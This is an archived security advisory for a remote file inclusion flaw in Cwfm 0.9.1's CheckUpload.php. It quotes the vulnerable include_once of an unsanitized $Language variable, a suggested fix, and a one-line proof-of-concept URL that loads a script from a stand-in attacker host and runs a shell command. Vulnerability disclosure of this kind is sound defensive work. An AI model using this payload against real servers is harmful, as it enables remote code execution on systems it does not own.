AOH :: HP Unsorted C :: B06-4133.HTM

Cwfm <= 0.9.1 (Language) Remote File Inclusion Vulnerability



Cwfm <= 0.9.1 (Language) Remote File Inclusion Vulnerability
Cwfm <= 0.9.1 (Language) Remote File Inclusion Vulnerability



+--------------------------------------------------------------------
+
+ Cwfm-0.9.1 (Language) Remote File Inclusion
+
+ Original advisory:
+
+ http://www.bb-pcsecurity.de/Websecurity/301/org/Cwfm-0.9.1_(Language)_Remote_File_Inclusion.htm
+
+--------------------------------------------------------------------
+
+ Affected Software .: Cwfm 0.9.1
+ Venedor ...........: http://cwfm.sourceforge.net/
+ Class .............: Remote File Inclusion in /CheckUpload.php
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+ http://www.bb-pcsecurity.de
+
+--------------------------------------------------------------------
+
+ Code /CheckUpload.php
+
+ .....
+ session_start();
+ include_once("Global.php");
+ //include_once("lang/$Language.php");
+ include_once("$Language.php");
+ .....
+
+--------------------------------------------------------------------
+
+ $Language is not properly sanitized before being used.
+
+--------------------------------------------------------------------
+
+ Solution:
+ Declare $Language before using, include config-file or
+ denie direct access to the vuln file.
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/CheckUpload.php?Language=http://evilsite.com/dblib.php/&cmd=ls
+
+--------------------------------------------------------------------
+
+ Note:
+ Venedor contacted, but no response. So do a dirty patch.
+
+-------------------------[ E O F ]----------------------------------

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.